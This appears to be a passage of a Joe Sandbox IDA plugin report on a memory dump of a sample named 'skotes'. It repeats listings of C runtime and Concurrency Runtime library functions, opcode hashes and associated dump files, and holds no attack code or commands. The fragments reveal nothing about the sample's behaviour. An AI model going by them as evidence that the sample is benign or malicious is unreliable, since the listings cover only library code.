Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: cc0b82fecd2c59df826b124bf7d658d402ff55089e9c11e5d3adc4867c0afcd3
Instruction ID: e68c21fc46fa4b257d9ae20e94bda47a17593d501b33d53c98e86ea2e58df0b3
Opcode Fuzzy Hash: cc0b82fecd2c59df826b124bf7d658d402ff55089e9c11e5d3adc4867c0afcd3
Instruction Fuzzy Hash: 1E01D632610521AFCE15BF64EC82E6EB76ABF867147400129F90457612CF65EC319BA0

Function 002AEE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 002AEE6A
ListArray.LIBCONCRT ref: 002AEE7C

Part of subcall function 002AEF29: _InternalDeleteHelper.LIBCONCRT ref: 002AEF3B

ListArray.LIBCONCRT ref: 002AEE86
_InternalDeleteHelper.LIBCONCRT ref: 002AEE9F

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 3d38442cda7524da45a5ac775eda58de62c157a13d12f51a80c14bb3ef5783fd
Instruction ID: 7cc5fc53e9a3eb5957cedd3ec1c43dce379fff358d1dab79e041d521abff406e
Opcode Fuzzy Hash: 3d38442cda7524da45a5ac775eda58de62c157a13d12f51a80c14bb3ef5783fd
Instruction Fuzzy Hash: FD018632610521AFCE25BB60D9C2D6EFB69FF867247060069F50497611CF20FC329AD0

Function 002AD0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 002AD0C5
ListArray.LIBCONCRT ref: 002AD0D7

Part of subcall function 002AC6B2: _InternalDeleteHelper.LIBCONCRT ref: 002AC6C4

ListArray.LIBCONCRT ref: 002AD0E1
_InternalDeleteHelper.LIBCONCRT ref: 002AD0FA

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 9fde86a04b16cefcf6593a4a816caf079504e4e6214af0a4e7d14f0c016c066d
Instruction ID: bd098dfc8e6bd7678f721457329dedb4bc6ebad2ec4664c952478e5369e64550
Opcode Fuzzy Hash: 9fde86a04b16cefcf6593a4a816caf079504e4e6214af0a4e7d14f0c016c066d
Instruction Fuzzy Hash: A601F932210521BFCE25BF60C9D2E6DB76DBF86714750002AF50597A11CF20EC719E90

Function 002B33C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 002B33DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 002B33EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 002B3407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 002B341F

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 6da63a6bf655f77364e839522ad153454667aa82d3ad0eed935dae6908615762
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: B401D632620615A7CF16EE548841AEF77A99F45790F100055FC12AB282DE71EE209AE0

Function 002A9510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 002A9519

Part of subcall function 0029F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 002A5486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 002A953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 002A9550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 002A9559

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction ID: 33579059c805437987b7a928158883c731007c7cf14aff6fa83c4f047bf04c6a
Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction Fuzzy Hash: 03F0A730A20A105FEA62AB598852F6B6395DF46751F00C45DE51B97182CE64F892CF50

Function 002BF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 002BF3A3

Strings

8"., xrefs: 002BF44B
`'., xrefs: 002BF375

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8".$`'.
API String ID: 3903695350-1407274480
Opcode ID: 6755b50375d7994ec020cae990b4d7e1858003dd11be026a22aa0cf945586a50
Instruction ID: b84be2d3ef211ad3324ae835c777a2c2012b2822b62d15c17639b6d5b4992752
Opcode Fuzzy Hash: 6755b50375d7994ec020cae990b4d7e1858003dd11be026a22aa0cf945586a50
Instruction Fuzzy Hash: 7F317A31620342EFEB60AE39DE45BDBB3E8EF00392F148469E045D7595DE71ACA08B21

Function 002BF1BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 002BF232
__freea.LIBCMT ref: 002BF298

Part of subcall function 002BB04B: RtlAllocateHeap.NTDLL(00000000,3C8350B4,?,?,0029D3FC,3C8350B4,?,00297A8B,?,?,?,?,?,?,00287465,?), ref: 002BB07E

Strings

Z+,m+, xrefs: 002BF1D2

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
